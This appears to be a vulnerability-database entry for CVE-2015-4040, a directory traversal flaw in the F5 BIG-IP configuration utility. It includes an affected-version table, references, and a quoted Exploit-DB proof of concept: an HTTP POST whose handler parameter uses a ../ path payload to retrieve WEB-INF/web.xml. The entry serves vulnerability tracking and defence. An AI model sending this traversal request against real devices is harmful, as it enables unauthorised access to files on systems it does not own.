CVE-2015-4040
medium
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
5.0
Description
Directory traversal vulnerability in the configuration utility in F5 BIG-IP before 12.0.0 and Enterprise Manager 3.0.0 through 3.1.1 allows remote authenticated users to access arbitrary files in the web root via unspecified vectors.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal
# Exploit Title: [F5 BigIP File Path Traversal Vulnerability]
# Discovered by: Karn Ganeshen
# Reported on: April 27, 2015
# New version released on: September 01, 2015
# Vendor Homepage: [www.f5.com]
# Version Reported: [F5 BIG-IP 10.2.4 Build 595.0 Hotfix HF3]
# CVE-2015-4040 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4040
]
# Multiple Additional F5 products & versions are Affected and documented
here:
https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html
*Vulnerability Details*
The handler parameter is vulnerable to file path manipulation attacks. When
we submit a payload
*/tmui/locallb/virtual_server/../../../../WEB-INF/web.xml* in the *handler*
parameter, the file *WEB-INF/web.xml* is returned.
*PoC:*
POST /tmui/Control/form HTTP/1.1
Host: <IP>
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://
<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp?&FilterBy=status_availability&Filter=2
Content-Type: application/x-www-form-urlencoded
Content-Length: 1004
Cookie: JSESSIONID=3211A73547444840255BAF39984E7E3F;
BIGIPAuthUsernameCookie=admin;
BIGIPAuthCookie=9B1099DD8A936DDBD58606DA3B5BABC7E82C43A5;
F5_CURRENT_PARTITION=Common;
f5formpage="/tmui/locallb/virtual_server/list.jsp?&";
f5_refreshpage="https%3A//<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp";
f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay=""
_timenow=Fri+Apr+24+14%3a48%3a38+EST+2015&_bufvalue_before=6hU2%2fMbRfPe7OHQ7VVc7TEffOpg%3d&exit_page=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&search_input=*&search_button_before=Search&_timeno
*...[SNIP]...*
fore=&enableObjList_before=&exit_page_before=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&row_count=0&_bufvalue_validation=NO_VALIDATION&disable_before=Disable&exit_button_before=Create...&handler=
*%2ftmui%2flocallb%2fvirtual_server%2f..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml*
*Web.xml is returned in the Response:*
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE web-app
PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN"
"http://java.sun.com/j2ee/dtds/web-app_2_2.dtd">
*<!--Automatically created by Tomcat JspC.--><web-app>*
*...[config file output redacted here]...*
*.....*Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| f5 | enterprise_manager | 3.0.0 | |
| f5 | enterprise_manager | 3.1.0 | |
| f5 | enterprise_manager | 3.1.1 | |
| f5 | big-ip_access_policy_manager | {"endIncluding":"11.6.0"} | |
| f5 | big-ip_advanced_firewall_manager | {"endIncluding":"11.6.0"} | |
| f5 | big-ip_analytics | {"endIncluding":"11.6.0"} | |
| f5 | big-ip_application_acceleration_manager | {"endIncluding":"11.6.0"} | |
| f5 | big-ip_application_security_manager | {"endIncluding":"11.6.0"} | |
| f5 | big-ip_edge_gateway | {"endIncluding":"11.3.0"} | |
| f5 | big-ip_global_traffic_manager | {"endIncluding":"11.3.0"} | |
| f5 | big-ip_link_controller | {"endIncluding":"11.3.0"} | |
| f5 | big-ip_local_traffic_manager | {"endIncluding":"11.6.0"} | |
| f5 | big-ip_policy_enforcement_manager | {"endIncluding":"11.3.0"} | |
| f5 | big-ip_protocol_security_module | {"endIncluding":"11.3.0"} | |
| f5 | big-ip_wan_optimization_manager | {"endIncluding":"11.3.0"} | |
| f5 | big-ip_webaccelerator | {"endIncluding":"11.3.0"} | |
References
- http://packetstormsecurity.com/files/133931/F5-BigIP-10.2.4-Build-595.0-HF3-Path-Traversal.html
- http://www.securitytracker.com/id/1033532
- http://www.securitytracker.com/id/1033533
- https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html
- http://packetstormsecurity.com/files/133931/F5-BigIP-10.2.4-Build-595.0-HF3-Path-Traversal.html
- http://www.securitytracker.com/id/1033532
- http://www.securitytracker.com/id/1033533
- https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.